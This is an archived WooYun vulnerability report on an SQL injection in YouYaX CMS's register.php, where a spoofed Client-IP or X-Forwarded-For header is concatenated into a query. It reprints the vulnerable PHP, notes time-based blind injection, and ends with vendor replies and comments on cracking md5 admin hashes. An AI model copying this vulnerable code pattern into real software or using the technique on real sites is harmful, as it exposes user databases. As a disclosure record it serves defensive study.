当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062045

漏洞标题:YouYaX某处SQL注入

相关厂商:youyax.com

漏洞作者: 只发通用型

提交时间:2014-05-27 10:36

修复时间:2014-08-25 10:38

公开时间:2014-08-25 10:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-27: 细节已通知厂商并且等待厂商处理中
2014-05-27: 厂商已经确认,细节仅向厂商公开
2014-07-21: 细节向核心白帽子及相关领域专家公开
2014-07-31: 细节向普通白帽子公开
2014-08-10: 细节向实习白帽子公开
2014-08-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

YouYaX是良心厂商~所以来刷点洞,第一个

详细说明:

/ext/register.php 文件
当($mix['is_prevent_reg']为true时

if($mix['is_prevent_reg']){
if (!empty($_SERVER['HTTP_CLIENT_IP']))
$myIp = $_SERVER['HTTP_CLIENT_IP'];
else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
$myIp = $_SERVER['HTTP_X_FORWARDED_FOR'];
else
$myIp = $_SERVER['REMOTE_ADDR'];
$sql = "select * from " . $config['db_prefix'] . "user where ip_addr='" . $myIp . "'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);


可以伪造IP进行注入,因为不回显应该是用延时注入比较合适.
这里echo 出sql语句做一下漏洞证明

1.jpg

漏洞证明:

1.jpg


为了管理员复现漏洞方便(该CMS还要配置邮件服务器,我注释这些代码)
复制了我的代码上来你复现直接粘贴上去就可以了

<?php
include('../ext_public/include.php');
include('../ext_public/database.php');
function doUserCount($param){
$count_arr = mysql_fetch_array(mysql_query("select * from " . $param . "count where id=1"));
$data=unserialize($count_arr['user_count']);
$date=date('w', time());
$date2=date('W',time());
if($date2 != $count_arr['week_order']){
mysql_query("update " . $param . "count set user_count='',post_count='',week_order='".$date2."' where id=1");
$count_arr = mysql_fetch_array(mysql_query("select * from " . $param . "count where id=1"));
$data=unserialize($count_arr['user_count']);
}
switch($date){
case 0:
@$data['g']++;
break;
case 1:
@$data['a']++;
break;
case 2:
@$data['b']++;
break;
case 3:
@$data['c']++;
break;
case 4:
@$data['d']++;
break;
case 5:
@$data['e']++;
break;
case 6:
@$data['f']++;
break;
}
mysql_query("update " . $param . "count set user_count='".serialize($data)."' where id=1");
}
if (isset($_POST['sub'])) {
if(empty($config['default_user_group'])||empty($config['not_log_in_user_group'])){
echo "<script>alert('请至后台[注册激活管理-配置]设置注册和未登陆默认用户组');</script>";
exit;
}
$user = htmlspecialchars(addslashes(trim($_POST['user'])), ENT_QUOTES, "UTF-8");
if(mb_strlen($user,'utf8')>7 || mb_strlen($user,'utf8')<2){
echo "<script>alert('用户名长度必须在2~7个字符之间');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
exit;
}
if (empty($_POST['pass'])) {
echo "<script>alert('密码必填');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
exit;
}
$pass = md5(addslashes($_POST['pass']));
$_POST['email']=addslashes($_POST['email']);
if (empty($_POST['email'])) {
echo "<script>alert('邮箱名必填');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
exit;
}
if($mix['is_prevent_reg']){
if (!empty($_SERVER['HTTP_CLIENT_IP']))
$myIp = $_SERVER['HTTP_CLIENT_IP'];
else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
$myIp = $_SERVER['HTTP_X_FORWARDED_FOR'];
else
$myIp = $_SERVER['REMOTE_ADDR'];
$sql = "select * from " . $config['db_prefix'] . "user where ip_addr='" . $myIp . "'";
$result = mysql_query($sql);
var_dump($sql);
$num = mysql_num_rows($result);
if($num >= $mix['prevent_reg_num']){
echo "<script>alert('注册失败,此IP地址已经使用超过 ".$mix['prevent_reg_num']." 次了');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
exit;
}
}
$code = '';
for ($i = 0; $i < 6; $i++) {
$code .= mt_rand(0, 9);
}
if($config['register_mode']==1){
/* $mailconf = require("../Conf/mail.config.php");
if(empty($mailconf['mail_Host'])&&empty($mailconf['mail_Username'])&&empty($mailconf['mail_Password'])){
echo "<script>alert('管理员后台未配置邮件服务器');</script>";
exit;
}*/
}
mysql_query("SET NAMES 'utf8'");
mysql_query("SET sql_mode=''");
date_default_timezone_set('Asia/Shanghai');
$sql = "select * from " . $config['db_prefix'] . "user where user='" . $user . "'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
//判断是否被注册
if ($num > 0) {
echo "<script>alert('该用户名已被注册');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
} else {
$sql2 = "select * from " . $config['db_prefix'] . "user where email='" . $_POST['email'] . "'";
$result2 = mysql_query($sql2);
$num2 = mysql_num_rows($result2);
if ($num2 > 0) {
echo "<script>alert('邮箱名已被注册');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
exit;
} else {
if($config['register_mode']==1){
/* require_once("../ext_public/phpmailer/class.phpmailer.php");
$mail = new PHPMailer();
$mail->IsSMTP();
$mail->Host = $mailconf['mail_Host'];
$mail->SMTPAuth = true;
$mail->Username = $mailconf['mail_Username'];
$mail->Password = $mailconf['mail_Password'];
$mail->From = $mailconf['mail_From'];
$mail->FromName = $mailconf['mail_FromName'];
$mail->AddAddress($_POST['email']);
$mail->IsHTML(true);
$mail->CharSet = "UTF-8";
$mail->Encoding = "base64";
$mail->Subject = $mailconf['mail_Subject'];
$mail->Body = $mailconf['mail_Body'] . "<a href='" . url_site . "/ext/mail_active.php?user=" . $user . "&pass=" . $pass . "&email=" . $_POST['email'] . "&code=" . $code . "'>点此激活</a>";
if (!empty($_POST['email'])) {
exit;
}*/
if($mix['is_prevent_reg']){
$sql = "insert into " . $config['db_prefix'] . "user(user,pass,status,email,complete,face,time,fatieshu,bid,codes,ip_addr,user_group) values('" . $user . "','" . $pass . "',0,'" . $_POST['email'] . "','0','00.gif',now(),0,'".$mix['bid_init']."','" . $code . "','".$myIp."','".$config['default_user_group']."')";
}else{
$sql = "insert into " . $config['db_prefix'] . "user(user,pass,status,email,complete,face,time,fatieshu,bid,codes,user_group) values('" . $user . "','" . $pass . "',0,'" . $_POST['email'] . "','0','00.gif',now(),0,'".$mix['bid_init']."','" . $code . "','".$config['default_user_group']."')";
}
mysql_query($sql);
doUserCount($config['db_prefix']);
echo "<script>alert('注册成功,请至邮箱激活!');</script>";
echo "<script>window.parent.location.href='" . url_site . "';</script>";
}else{
if(addslashes($_POST['valicode'])!=$_SESSION['verify']){
echo "<script>alert('输入的验证码不正确!');</script>";
exit;
}else{
if($mix['is_prevent_reg']){
$sql = "insert into " . $config['db_prefix'] . "user(user,pass,status,email,complete,face,time,fatieshu,bid,codes,ip_addr,user_group) values('" . $user . "','" . $pass . "',1,'" . $_POST['email'] . "','0','00.gif',now(),0,'".$mix['bid_init']."','". $code . "','".$myIp."','".$config['default_user_group']."')";
}else{
$sql = "insert into " . $config['db_prefix'] . "user(user,pass,status,email,complete,face,time,fatieshu,bid,codes,user_group) values('" . $user . "','" . $pass . "',1,'" . $_POST['email'] . "','0','00.gif',now(),0,'".$mix['bid_init']."','". $code . "','".$config['default_user_group']."')";
}
mysql_query($sql);
doUserCount($config['db_prefix']);
echo "<script>alert('注册成功!');</script>";
$_SESSION['youyax_data'] = 1;
$_SESSION['youyax_user'] = $user;
$_SESSION['youyax_bz'] = 1;
echo "<script>window.parent.location.href='" . url_site . "';</script>";
}
}
}
}
}
?>

修复方案:

对IP正则判断

版权声明:转载请注明来源 只发通用型@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-05-27 12:19

厂商回复:

似乎可以绕过注册限制,多谢反馈

最新状态:

2014-05-27:公开漏洞是为了在程序发展初期,无太多用户积累的情况下更好的检测安全性


漏洞评价:

评论

  1. 2014-05-27 14:13 | 只发通用型 ( 实习白帽子 | Rank:93 漏洞数:14 | 刷通用型奖金小号)

    http://bbs.youyax.com/Content-index-id-5411.aspx

  2. 2014-05-27 14:26 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @只发通用型 还在初期阶段的系统啊,提前重视起安全是个好开始 :P

  3. 2014-05-27 14:40 | YouYaX(乌云厂商)

    @只发通用型 这个的确是一种隐患啊,这样数据库逐个测试可以拿到后台管理员帐户但是似乎不能拿到密码吧,因为是经过md5加密后存在admin表中的,就算这样测试拿到了所有的md5密码也是不可逆的,密码复杂的时候破解不了的

  4. 2014-05-27 19:09 | 只发通用型 ( 实习白帽子 | Rank:93 漏洞数:14 | 刷通用型奖金小号)

    @YouYaX http://www.cmd5.com/ MD5可以在这个网站上查 查不出来他会帮你暴力破解 你们的安全意识有待提高啊

  5. 2014-05-27 21:47 | YouYaX(乌云厂商)

    @只发通用型 没有“们”,只有我一个人。

  6. 2014-05-28 09:22 | 养乐多Ngan ( 普通白帽子 | Rank:652 漏洞数:72 | Hello,world.其实最大的漏洞,是人心。)

    @YouYaX 你屌炸天了!我有你们的一个洞,只是还没发。。

  7. 2014-05-28 09:22 | 养乐多Ngan ( 普通白帽子 | Rank:652 漏洞数:72 | Hello,world.其实最大的漏洞,是人心。)

    @YouYaX 打错,是“你”。。。

  8. 2014-06-04 09:31 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )

    @养乐多Ngan 谁叫你不发啊 哈哈

  9. 2014-06-04 16:36 | 养乐多Ngan ( 普通白帽子 | Rank:652 漏洞数:72 | Hello,world.其实最大的漏洞,是人心。)

    @neal 没事 貌似不是同一处